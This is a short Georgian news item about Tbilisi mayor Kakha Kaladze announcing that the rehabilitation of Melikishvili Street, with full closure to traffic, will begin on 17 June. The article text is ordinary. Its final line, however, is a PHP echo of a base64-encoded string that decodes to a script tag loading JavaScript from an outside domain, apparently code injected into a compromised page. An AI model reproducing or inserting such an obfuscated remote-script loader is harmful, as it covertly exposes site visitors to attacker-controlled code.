celsiusi
ავერსი საქკაბელი
თბილისის მერის კახა კალაძის განცხადებით, მელიქიშვილის ქუჩის რეაბილიტაცია 15 ივნისის ნაცვლად, 17 ივნისს დაიწყება, რისთვისაც ქუჩაზე სატრანსპორტო მოძრაობა სრულად შეიზღუდება.
 
ამის შესახებ მან დედაქალაქის მთავრობის სხდომის დაწყებამდე განაცხადა.
 
"ნათქვამი გვქონდა, რომ 15 ივნისს დაიწყებოდა სამუშაოები, თუმცა მივიღეთ გადაწყვეტილება, რომ მელიქიშვილის ქუჩა 17 ივნისს საღამოდან ჩაიკეტება. ახალი მოძრაობის წესები - რომელ ქუჩაზე, რა მიმართულებით იქნება მოძრაობა - ამის შესახებ ვიდეორგოლები ტელევიზიით და სოციალურ ქსელებში უკვე ტრიალებს. იცით, რომ ვარაზის ხევი და კოსტავას ქუჩა ორმხრივი იქნება. 17 ივნისიდან მელიქიშვილზე გადაადგილება შეიზღუდება და იმ აღნიშნულ ქუჩებზე გადაეწყობა. ასე რომ, მელიქიშვილის გამზირის სარეაბილიტაციო სამუშაოები 17 ივნისიდან დაიწყება“, - განაცხადა კალაძემ.
 
მისი თქმით, მელიქიშვილის ქუჩის სრული რეაბილიტაცია მოხდება, რა დროსაც შეიცვლება წყლის და წყალარინების სისტემები და ინფრასტრუქტურა სრულად განახლდება.
621
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");